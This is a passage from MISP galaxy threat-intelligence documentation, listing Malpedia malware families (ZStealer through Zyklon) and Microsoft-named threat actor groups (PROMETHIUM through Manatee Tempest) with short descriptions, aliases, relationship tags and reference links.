https://www.forcepoint.com/blog/x-labs/invoicing-spam-campaigns-malware-zloader

https://www.hornetsecurity.com/en/threat-research/zloader-email-campaign-using-mhtml-to-download-and-decrypt-xls/

https://www.bleepingcomputer.com/news/security/fake-microsoft-teams-updates-lead-to-cobalt-strike-deployment/

https://www.prodaft.com/m/reports/RIG_TLP_CLEAR-1.pdf

https://www.bleepingcomputer.com/news/security/banking-malware-spreading-via-covid-19-relief-payment-phishing/

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/

https://documents.trendmicro.com/assets/txt/IOCs-zloader-campaigns-at-a-glance.txt

https://www.youtube.com/watch?v=QBoj6GB79wM

https://twitter.com/ffforward/status/1324281530026524672

https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/

https://www.cisa.gov/uscert/ncas/alerts/aa22-110a

https://blog.alyac.co.kr/3322

https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware

ZStealer

Information Stealer used by Void Balaur.

The tag is: misp-galaxy:malpedia="ZStealer"

ZStealer is also known as:

  • Z*Stealer

Table 5071. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.zstealer

https://documents.trendmicro.com/assets/white_papers/wp-void-balaur-tracking-a-cybermercenarys-activities.pdf

https://twitter.com/Arkbird_SOLG/status/1458973883068043264

Zumanek

According to ESET, this malware family was active exclusively in Brazil until the middle of 2020. It s identified by its method for obfuscating strings. It creates a function for each character of the alphabet and then concatenates the result of calling the correct functions in sequence.

The tag is: misp-galaxy:malpedia="Zumanek"

Zumanek is also known as:

Table 5072. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.zumanek

https://www.welivesecurity.com/2021/12/15/dirty-dozen-latin-america-amavaldo-zumanek/

https://www.welivesecurity.com/br/2018/01/17/zumanek-malware-tenta-roubar-credenciais-de-servicos/

ZUpdater

The tag is: misp-galaxy:malpedia="ZUpdater"

ZUpdater is also known as:

  • Zpevdo

Table 5073. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.zupdater

https://app.any.run/tasks/ea024149-8e83-41c0-b0ed-32ec38dea4a6/

ZXShell

According to FireEye, ZXSHELL is a backdoor that can be downloaded from the internet, particularly Chinese hacker websites. The backdoor can launch port scans, run a keylogger, capture screenshots, set up an HTTP or SOCKS proxy, launch a reverse command shell, cause SYN floods, and transfer/delete/run files. The publicly available version of the tool provides a graphical user interface that malicious actors can use to interact with victim backdoors. Simplified Chinese is the language used for the bundled ZXSHELL documentation.

The tag is: misp-galaxy:malpedia="ZXShell"

ZXShell is also known as:

  • Sensocode

Table 5075. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.zxshell

https://www.secureworks.com/research/a-peek-into-bronze-unions-toolbox

https://lab52.io/blog/apt27-rootkit-updates/

https://content.fireeye.com/apt-41/rpt-apt41

https://attack.mitre.org/groups/G0096

https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf

https://www.secureworks.com/research/threat-profiles/bronze-keystone

https://mp.weixin.qq.com/s/K1uBLGqD8kgsIp1yTyYBfw

https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-GuPan.pdf

https://www.secureworks.com/research/threat-profiles/bronze-union

https://blogs.cisco.com/security/talos/opening-zxshell

https://attack.mitre.org/groups/G0001/

https://meltx0r.github.io/tech/2019/09/19/emissary-panda-apt.html

https://risky.biz/whatiswinnti/

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lancefly-merdoor-zxshell-custom-backdoor

https://github.com/smb01/zxshell

https://unit42.paloaltonetworks.com/atoms/iron-taurus/

https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-decade-of-the-rats.pdf

ZxxZ

Cisco Talos attributes this backdoor with moderate confidence to the Bitter APT.

The tag is: misp-galaxy:malpedia="ZxxZ"

ZxxZ is also known as:

  • MuuyDownloader

Table 5076. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.zxxz

https://www.secuinfra.com/en/techtalk/whatever-floats-your-boat-bitter-apt-continues-to-target-bangladesh/

https://blog.talosintelligence.com/2022/05/bitter-apt-adds-bangladesh-to-their.html

Zyklon

According to FireEye, Zyklon or Zyklon HTTP is a publicly available, full-featured backdoor capable of keylogging, password harvesting, downloading and executing additional plugins, conducting distributed denial-of-service (DDoS) attacks, and self-updating and self-removal. The malware may communicate with its command and control (C2) server over The Onion Router (Tor) network if configured to do so. The malware can download several plugins, some of which include features such as cryptocurrency mining and password recovery, from browsers and email software. Zyklon also provides a very efficient mechanism to monitor the spread and impact.

The tag is: misp-galaxy:malpedia="Zyklon"

Zyklon is also known as:

Table 5077. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.zyklon

https://www.fireeye.com/blog/threat-research/2018/01/microsoft-office-vulnerabilities-used-to-distribute-zyklon-malware.html

https://blog.talosintelligence.com/2017/05/modified-zyklon-and-plugins-from-india.html

Microsoft Activity Group actor

Activity groups as described by Microsoft.

Microsoft Activity Group actor is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

Various

PROMETHIUM

PROMETHIUM is an activity group that has been active as early as 2012. The group primarily uses Truvasys, a first-stage malware that has been in circulation for several years. Truvasys has been involved in several attack campaigns, where it has masqueraded as one of server common computer utilities, including WinUtils, TrueCrypt, WinRAR, or SanDisk. In each of the campaigns, Truvasys malware evolved with additional features—this shows a close relationship between the activity groups behind the campaigns and the developers of the malware.

The tag is: misp-galaxy:microsoft-activity-group="PROMETHIUM"

PROMETHIUM has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="PROMETHIUM - G0056" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="PROMETHIUM" with estimative-language:likelihood-probability="likely"

Table 5078. Table References

Links

https://blogs.technet.microsoft.com/mmpc/2016/12/14/twin-zero-day-attacks-promethium-and-neodymium-target-individuals-in-europe/

NEODYMIUM

NEODYMIUM is an activity group that is known to use a backdoor malware detected by Microsoft as Wingbird. This backdoor’s characteristics closely match FinFisher, a government-grade commercial surveillance package. Data about Wingbird activity indicate that it is typically used to attack individual computers instead of networks.

The tag is: misp-galaxy:microsoft-activity-group="NEODYMIUM"

NEODYMIUM has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="NEODYMIUM - G0055" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="NEODYMIUM" with estimative-language:likelihood-probability="likely"

Table 5079. Table References

Links

https://blogs.technet.microsoft.com/mmpc/2016/12/14/twin-zero-day-attacks-promethium-and-neodymium-target-individuals-in-europe/

TERBIUM

Microsoft Threat Intelligence identified similarities between this recent attack and previous 2012 attacks against tens of thousands of computers belonging to organizations in the energy sector. Microsoft Threat Intelligence refers to the activity group behind these attacks as TERBIUM, following our internal practice of assigning rogue actors chemical element names.

The tag is: misp-galaxy:microsoft-activity-group="TERBIUM"

TERBIUM has relationships with:

  • similar: misp-galaxy:threat-actor="TERBIUM" with estimative-language:likelihood-probability="likely"

Table 5080. Table References

Links

https://blogs.technet.microsoft.com/mmpc/2016/12/09/windows-10-protection-detection-and-response-against-recent-attacks/

STRONTIUM

STRONTIUM has been active since at least 2007. Whereas most modern untargeted malware is ultimately profit-oriented, STRONTIUM mainly seeks sensitive information. Its primary institutional targets have included government bodies, diplomatic institutions, and military forces and installations in NATO member states and certain Eastern European countries. Additional targets have included journalists, political advisors, and organizations associated with political activism in central Asia. STRONTIUM is an activity group that usually targets government agencies, diplomatic institutions, and military organizations, as well as affiliated private sector organizations such as defense contractors and public policy research institutes. Microsoft has attributed more 0-day exploits to STRONTIUM than any other tracked group in 2016. STRONTIUM frequently uses compromised e-mail accounts from one victim to send malicious e-mails to a second victim and will persistently pursue specific targets for months until they are successful in compromising the victims’ computer.

The tag is: misp-galaxy:microsoft-activity-group="STRONTIUM"

STRONTIUM is also known as:

  • APT 28

  • APT28

  • Pawn Storm

  • Fancy Bear

  • Sednit

  • TsarTeam

  • TG-4127

  • Group-4127

  • Sofacy

  • Grey-Cloud

STRONTIUM has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="APT28 - G0007" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="APT28" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:360net-threat-actor="奇幻熊 - APT-C-20" with estimative-language:likelihood-probability="likely"

Table 5081. Table References

Links

https://blogs.technet.microsoft.com/mmpc/2016/11/01/our-commitment-to-our-customers-security/

http://download.microsoft.com/download/4/4/C/44CDEF0E-7924-4787-A56A-16261691ACE3/Microsoft_Security_Intelligence_Report_Volume_19_A_Profile_Of_A_Persistent_Adversary_English.pdf

https://blogs.technet.microsoft.com/mmpc/2015/11/16/microsoft-security-intelligence-report-strontium/

https://blogs.microsoft.com/on-the-issues/2018/08/20/we-are-taking-new-steps-against-broadening-threats-to-democracy/

https://www.bleepingcomputer.com/news/security/microsoft-disrupts-apt28-hacking-campaign-aimed-at-us-midterm-elections/

DUBNIUM

DUBNIUM (which shares indicators with what Kaspersky researchers have called DarkHotel) is one of the activity groups that has been very active in recent years, and has many distinctive features.

The tag is: misp-galaxy:microsoft-activity-group="DUBNIUM"

DUBNIUM is also known as:

  • darkhotel

DUBNIUM has relationships with:

  • similar: misp-galaxy:threat-actor="DarkHotel" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:360net-threat-actor="Darkhotel - APT-C-06" with estimative-language:likelihood-probability="likely"

Table 5082. Table References

Links

https://securelist.com/blog/research/71713/darkhotels-attacks-in-2015/

https://blogs.technet.microsoft.com/mmpc/2016/06/09/reverse-engineering-dubnium-2

https://blogs.technet.microsoft.com/mmpc/2016/06/20/reverse-engineering-dubniums-flash-targeting-exploit/

https://blogs.technet.microsoft.com/mmpc/2016/07/14/reverse-engineering-dubnium-stage-2-payload-analysis/

PLATINUM

PLATINUM has been targeting its victims since at least as early as 2009, and may have been active for several years prior. Its activities are distinctly different not only from those typically seen in untargeted attacks, but from many targeted attacks as well. A large share of targeted attacks can be characterized as opportunistic: the activity group changes its target profiles and attack geographies based on geopolitical seasons, and may attack institutions all over the world. Like many such groups, PLATINUM seeks to steal sensitive intellectual property related to government interests, but its range of preferred targets is consistently limited to specific governmental organizations, defense institutes, intelligence agencies, diplomatic institutions, and telecommunication providers in South and Southeast Asia. The group’s persistent use of spear phishing tactics (phishing attempts aimed at specific individuals) and access to previously undiscovered zero-day exploits have made it a highly resilient threat.

The tag is: misp-galaxy:microsoft-activity-group="PLATINUM"

PLATINUM has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="PLATINUM - G0068" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="PLATINUM" with estimative-language:likelihood-probability="likely"

Table 5083. Table References

Links

https://blogs.technet.microsoft.com/mmpc/2016/04/26/digging-deep-for-platinum/

http://download.microsoft.com/download/2/2/5/225BFE3E-E1DE-4F5B-A77B-71200928D209/Platinum%20feature%20article%20-%20Targeted%20attacks%20in%20South%20and%20Southeast%20Asia%20April%202016.pdf

BARIUM

Microsoft Threat Intelligence associates Winnti with multiple activity groups—collections of malware, supporting infrastructure, online personas, victimology, and other attack artifacts that the Microsoft intelligent security graph uses to categorize and attribute threat activity. Microsoft labels activity groups using code names derived from elements in the periodic table. In the case of this malware, the activity groups strongly associated with Winnti are BARIUM and LEAD. But even though they share the use of Winnti, the BARIUM and LEAD activity groups are involved in very different intrusion scenarios. BARIUM begins its attacks by cultivating relationships with potential victims—particularly those working in Business Development or Human Resources—on various social media platforms. Once BARIUM has established rapport, they spear-phish the victim using a variety of unsophisticated malware installation vectors, including malicious shortcut (.lnk) files with hidden payloads, compiled HTML help (.chm) files, or Microsoft Office documents containing macros or exploits. Initial intrusion stages feature the Win32/Barlaiy implant—notable for its use of social network profiles, collaborative document editing sites, and blogs for C&C. Later stages of the intrusions rely upon Winnti for persistent access. The majority of victims recorded to date have been in electronic gaming, multimedia, and Internet content industries, although occasional intrusions against technology companies have occurred.

The tag is: misp-galaxy:microsoft-activity-group="BARIUM"

BARIUM has relationships with:

  • similar: misp-galaxy:threat-actor="APT41" with estimative-language:likelihood-probability="likely"

Table 5084. Table References

Links

https://blogs.technet.microsoft.com/mmpc/2017/01/25/detecting-threat-actors-in-recent-german-industrial-attacks-with-windows-defender-atp/

LEAD

In contrast, LEAD has established a far greater reputation for industrial espionage. In the past few years, LEAD’s victims have included: Multinational, multi-industry companies involved in the manufacture of textiles, chemicals, and electronics Pharmaceutical companies A company in the chemical industry University faculty specializing in aeronautical engineering and research A company involved in the design and manufacture of motor vehicles A cybersecurity company focusing on protecting industrial control systems During these intrusions, LEAD’s objective was to steal sensitive data, including research materials, process documents, and project plans. LEAD also steals code-signing certificates to sign its malware in subsequent attacks. In most cases, LEAD’s attacks do not feature any advanced exploit techniques. The group also does not make special effort to cultivate victims prior to an attack. Instead, the group often simply emails a Winnti installer to potential victims, relying on basic social engineering tactics to convince recipients to run the attached malware. In some other cases, LEAD gains access to a target by brute-forcing remote access login credentials, performing SQL injection, or exploiting unpatched web servers, and then they copy the Winnti installer directly to compromised machines.

The tag is: misp-galaxy:microsoft-activity-group="LEAD"

LEAD has relationships with:

  • similar: misp-galaxy:threat-actor="APT41" with estimative-language:likelihood-probability="likely"

Table 5085. Table References

Links

https://blogs.technet.microsoft.com/mmpc/2017/01/25/detecting-threat-actors-in-recent-german-industrial-attacks-with-windows-defender-atp/

ZIRCONIUM

In addition to strengthening generic detection of EoP exploits, Microsoft security researchers are actively gathering threat intelligence and indicators attributable to ZIRCONIUM, the activity group using the CVE-2017-0005 exploit.

The tag is: misp-galaxy:microsoft-activity-group="ZIRCONIUM"

ZIRCONIUM has relationships with:

  • similar: misp-galaxy:threat-actor="APT31" with estimative-language:likelihood-probability="likely"

Table 5086. Table References

Links

https://blogs.technet.microsoft.com/mmpc/2017/03/27/detecting-and-mitigating-elevation-of-privilege-exploit-for-cve-2017-0005/

GALLIUM

Microsoft Threat Intelligence Center (MSTIC) is raising awareness of the ongoing activity by a group we call GALLIUM, targeting telecommunication providers. When Microsoft customers have been targeted by this activity, we notified them directly with the relevant information they need to protect themselves. By sharing the detailed methodology and indicators related to GALLIUM activity, we’re encouraging the security community to implement active defenses to secure the broader ecosystem from these attacks. To compromise targeted networks, GALLIUM target unpatched internet-facing services using publicly available exploits and have been known to target vulnerabilities in WildFly/JBoss. Once persistence is established in a network, GALLIUM uses common techniques and tools like Mimikatz to obtain credentials that allows for lateral movement across the target network. Within compromised networks, GALLIUM makes no attempt to obfuscate their intent and are known to use common versions of malware and publicly available toolkits with small modifications. The operators rely on low cost and easy to replace infrastructure that consists of dynamic-DNS domains and regularly reused hop points. This activity from GALLIUM has been identified predominantly through 2018 to mid-2019. GALLIUM is still active; however, activity levels have dropped when compared to what was previously observed.

The tag is: misp-galaxy:microsoft-activity-group="GALLIUM"

GALLIUM is also known as:

  • Operation Soft Cell

GALLIUM has relationships with:

  • similar: misp-galaxy:threat-actor="Operation Soft Cell" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="GALLIUM" with estimative-language:likelihood-probability="almost-certain"

Table 5087. Table References

Links

https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/

PARINACOTA

One actor that has emerged in this trend of human-operated attacks is an active, highly adaptive group that frequently drops Wadhrama as payload. PARINACOTA impacts three to four organizations every week and appears quite resourceful: during the 18 months that we have been monitoring it, we have observed the group change tactics to match its needs and use compromised machines for various purposes, including cryptocurrency mining, sending spam emails, or proxying for other attacks. The group’s goals and payloads have shifted over time, influenced by the type of compromised infrastructure, but in recent months, they have mostly deployed the Wadhrama ransomware. The group most often employs a smash-and-grab method, whereby they attempt to infiltrate a machine in a network and proceed with subsequent ransom in less than an hour. There are outlier campaigns in which they attempt reconnaissance and lateral movement, typically when they land on a machine and network that allows them to quickly and easily move throughout the environment. PARINACOTA’s attacks typically brute forces their way into servers that have Remote Desktop Protocol (RDP) exposed to the internet, with the goal of moving laterally inside a network or performing further brute-force activities against targets outside the network. This allows the group to expand compromised infrastructure under their control. Frequently, the group targets built-in local administrator accounts or a list of common account names. In other instances, the group targets Active Directory (AD) accounts that they compromised or have prior knowledge of, such as service accounts of known vendors. The group adopted the RDP brute force technique that the older ransomware called Samas (also known as SamSam) infamously used. Other malware families like GandCrab, MegaCortext, LockerGoga, Hermes, and RobbinHood have also used this method in targeted ransomware attacks. PARINACOTA, however, has also been observed to adapt to any path of least resistance they can utilize. For instance, they sometimes discover unpatched systems and use disclosed vulnerabilities to gain initial access or elevate privileges.

The tag is: misp-galaxy:microsoft-activity-group="PARINACOTA"

PARINACOTA has relationships with:

  • uses: misp-galaxy:ransomware="Wadhrama" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="PARINACOTA" with estimative-language:likelihood-probability="almost-certain"

Table 5088. Table References

Links

https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/

GADOLINIUM

GADOLINIUM is a nation-state activity group that has been compromising targets for nearly a decade with a worldwide focus on the maritime and health industries. As with most threat groups, GADOLINIUM tracks the tools and techniques of security practitioners looking for new techniques they can use or modify to create new exploit methods. Historically, GADOLINIUM used custom-crafted malware families that analysts can identify and defend against. In response, over the last year GADOLINIUM has begun to modify portions of its toolchain to use open-source toolkits to obfuscate their activity and make it more difficult for analysts to track. Because cloud services frequently offer a free trial or one-time payment (PayGo) account offerings, malicious actors have found ways to take advantage of these legitimate business offerings. By establishing free or PayGo accounts, they can use cloud-based technology to create a malicious infrastructure that can be established quickly then taken down before detection or given up at little cost.

The tag is: misp-galaxy:microsoft-activity-group="GADOLINIUM"

GADOLINIUM has relationships with:

  • similar: misp-galaxy:threat-actor="APT40" with estimative-language:likelihood-probability="likely"

Table 5089. Table References

Links

https://www.microsoft.com/security/blog/2020/09/24/gadolinium-detecting-empires-cloud/

HAFNIUM

HAFNIUM primarily targets entities in the United States across a number of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and NGOs. HAFNIUM has previously compromised victims by exploiting vulnerabilities in internet-facing servers, and has used legitimate open-source frameworks, like Covenant, for command and control. Once they’ve gained access to a victim network, HAFNIUM typically exfiltrates data to file sharing sites like MEGA. In campaigns unrelated to these vulnerabilities, Microsoft has observed HAFNIUM interacting with victim Office 365 tenants. While they are often unsuccessful in compromising customer accounts, this reconnaissance activity helps the adversary identify more details about their targets’ environments. HAFNIUM operates primarily from leased virtual private servers (VPS) in the United States.

The tag is: misp-galaxy:microsoft-activity-group="HAFNIUM"

HAFNIUM has relationships with:

  • similar: misp-galaxy:threat-actor="HAFNIUM" with estimative-language:likelihood-probability="almost-certain"

Table 5090. Table References

Links

https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/

NOBELIUM

Threat actor behind the attacks against SolarWinds, the SUNBURST backdoor, TEARDROP malware, GoldMax malware.

The tag is: misp-galaxy:microsoft-activity-group="NOBELIUM"

NOBELIUM has relationships with:

  • similar: misp-galaxy:threat-actor="UNC2452" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:backdoor="SUNBURST" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:tool="TEARDROP" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:tool="GoldMax" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:tool="SNOWYAMBER" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:tool="HALFRIG" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:tool="QUARTERRIG" with estimative-language:likelihood-probability="likely"

Table 5091. Table References

Links

https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/

Aqua Blizzard

The tag is: misp-galaxy:microsoft-activity-group="Aqua Blizzard"

Aqua Blizzard is also known as:

  • ACTINIUM

  • UNC530

  • Primitive Bear

  • Gamaredon

Aqua Blizzard has relationships with:

  • similar: misp-galaxy:threat-actor="Gamaredon Group" with estimative-language:likelihood-probability="likely"

Table 5092. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Brass Typhoon

The tag is: misp-galaxy:microsoft-activity-group="Brass Typhoon"

Brass Typhoon is also known as:

  • BARIUM

  • APT41

Brass Typhoon has relationships with:

  • similar: misp-galaxy:threat-actor="APT41" with estimative-language:likelihood-probability="likely"

Table 5093. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Cadet Blizzard

The tag is: misp-galaxy:microsoft-activity-group="Cadet Blizzard"

Cadet Blizzard is also known as:

  • DEV-0586

Cadet Blizzard has relationships with:

  • similar: misp-galaxy:threat-actor="DEV-0586" with estimative-language:likelihood-probability="likely"

Table 5094. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Camouflage Tempest

The tag is: misp-galaxy:microsoft-activity-group="Camouflage Tempest"

Camouflage Tempest is also known as:

  • TAAL

  • FIN6

  • Skeleton Spider

Camouflage Tempest has relationships with:

  • similar: misp-galaxy:threat-actor="FIN6" with estimative-language:likelihood-probability="likely"

Table 5095. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Canvas Cyclone

The tag is: misp-galaxy:microsoft-activity-group="Canvas Cyclone"

Canvas Cyclone is also known as:

  • BISMUTH

  • APT32

  • OceanLotus

Canvas Cyclone has relationships with:

  • similar: misp-galaxy:threat-actor="APT32" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:360net-threat-actor="海莲花 - APT-C-00" with estimative-language:likelihood-probability="likely"

Table 5096. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Caramel Tsunami

The tag is: misp-galaxy:microsoft-activity-group="Caramel Tsunami"

Caramel Tsunami is also known as:

  • SOURGUM

  • Candiru

Table 5097. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Carmine Tsunami

The tag is: misp-galaxy:microsoft-activity-group="Carmine Tsunami"

Carmine Tsunami is also known as:

  • DEV-0196

  • QuaDream

Table 5098. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Charcoal Typhoon

The tag is: misp-galaxy:microsoft-activity-group="Charcoal Typhoon"

Charcoal Typhoon is also known as:

  • CHROMIUM

  • ControlX

Charcoal Typhoon has relationships with:

  • similar: misp-galaxy:threat-actor="Earth Lusca" with estimative-language:likelihood-probability="likely"

Table 5099. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Cinnamon Tempest

The tag is: misp-galaxy:microsoft-activity-group="Cinnamon Tempest"

Cinnamon Tempest is also known as:

  • DEV-0401

  • Emperor Dragonfly

  • Bronze Starlight

Cinnamon Tempest has relationships with:

  • similar: misp-galaxy:threat-actor="BRONZE STARLIGHT" with estimative-language:likelihood-probability="likely"

Table 5100. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Circle Typhoon

The tag is: misp-galaxy:microsoft-activity-group="Circle Typhoon"

Circle Typhoon is also known as:

  • DEV-0322

Table 5101. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Cotton Sandstorm

The tag is: misp-galaxy:microsoft-activity-group="Cotton Sandstorm"

Cotton Sandstorm is also known as:

  • NEPTUNIUM

  • Vice Leaker

  • DEV-0198

Table 5102. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Crimson Sandstorm

The tag is: misp-galaxy:microsoft-activity-group="Crimson Sandstorm"

Crimson Sandstorm is also known as:

  • CURIUM

  • TA456

  • Tortoise Shell

Table 5103. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Cuboid Sandstorm

The tag is: misp-galaxy:microsoft-activity-group="Cuboid Sandstorm"

Cuboid Sandstorm is also known as:

  • DEV-0228

Table 5104. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Denim Tsunami

The tag is: misp-galaxy:microsoft-activity-group="Denim Tsunami"

Denim Tsunami is also known as:

  • KNOTWEED

  • DSIRF

Table 5105. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Diamond Sleet

The tag is: misp-galaxy:microsoft-activity-group="Diamond Sleet"

Diamond Sleet is also known as:

  • ZINC

  • Labyrinth Chollima

  • Lazarus

Diamond Sleet has relationships with:

  • similar: misp-galaxy:threat-actor="Lazarus Group" with estimative-language:likelihood-probability="likely"

Table 5106. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Emerald Sleet

The tag is: misp-galaxy:microsoft-activity-group="Emerald Sleet"

Emerald Sleet is also known as:

  • THALLIUM

  • Kimsuky

  • Velvet Chollima

Emerald Sleet has relationships with:

  • similar: misp-galaxy:threat-actor="Kimsuky" with estimative-language:likelihood-probability="likely"

Table 5107. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Forest Blizzard

The tag is: misp-galaxy:microsoft-activity-group="Forest Blizzard"

Forest Blizzard is also known as:

  • STRONTIUM

  • APT28

  • Fancy Bear

Forest Blizzard has relationships with:

  • similar: misp-galaxy:threat-actor="APT28" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:360net-threat-actor="奇幻熊 - APT-C-20" with estimative-language:likelihood-probability="likely"

Table 5108. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Ghost Blizzard

The tag is: misp-galaxy:microsoft-activity-group="Ghost Blizzard"

Ghost Blizzard is also known as:

  • BROMINE

  • Energetic Bear

  • Crouching Yeti

Ghost Blizzard has relationships with:

  • similar: misp-galaxy:threat-actor="ENERGETIC BEAR" with estimative-language:likelihood-probability="likely"

Table 5109. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Gingham Typhoon

The tag is: misp-galaxy:microsoft-activity-group="Gingham Typhoon"

Gingham Typhoon is also known as:

  • GADOLINIUM

  • APT40

  • Leviathan

  • TEMP.Periscope

  • Kryptonite Panda

Gingham Typhoon has relationships with:

  • similar: misp-galaxy:threat-actor="APT40" with estimative-language:likelihood-probability="likely"

Table 5110. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Granite Typhoon

The tag is: misp-galaxy:microsoft-activity-group="Granite Typhoon"

Granite Typhoon is also known as:

  • GALLIUM

Granite Typhoon has relationships with:

  • similar: misp-galaxy:threat-actor="GALLIUM" with estimative-language:likelihood-probability="likely"

Table 5111. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Gray Sandstorm

The tag is: misp-galaxy:microsoft-activity-group="Gray Sandstorm"

Gray Sandstorm is also known as:

  • DEV-0343

Table 5112. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Hazel Sandstorm

The tag is: misp-galaxy:microsoft-activity-group="Hazel Sandstorm"

Hazel Sandstorm is also known as:

  • EUROPIUM

  • Cobalt Gypsy

  • APT34

  • OilRig

Hazel Sandstorm has relationships with:

  • similar: misp-galaxy:threat-actor="OilRig" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Cleaver" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="CHRYSENE" with estimative-language:likelihood-probability="likely"

Table 5113. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Lace Tempest

The tag is: misp-galaxy:microsoft-activity-group="Lace Tempest"

Lace Tempest is also known as:

  • DEV-0950

  • FIN11

  • TA505

Lace Tempest has relationships with:

  • similar: misp-galaxy:threat-actor="TA505" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="FIN11" with estimative-language:likelihood-probability="likely"

Table 5114. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Lemon Sandstorm

The tag is: misp-galaxy:microsoft-activity-group="Lemon Sandstorm"

Lemon Sandstorm is also known as:

  • RUBIDIUM

  • Fox Kitten

  • UNC757

  • PioneerKitten

Lemon Sandstorm has relationships with:

  • similar: misp-galaxy:threat-actor="Fox Kitten" with estimative-language:likelihood-probability="likely"

Table 5115. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Lilac Typhoon

The tag is: misp-galaxy:microsoft-activity-group="Lilac Typhoon"

Lilac Typhoon is also known as:

  • DEV-0234

Table 5116. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Manatee Tempest

The tag is: misp-galaxy:microsoft-activity-group="Manatee Tempest"

Manatee Tempest is also known as:

  • DEV-0243

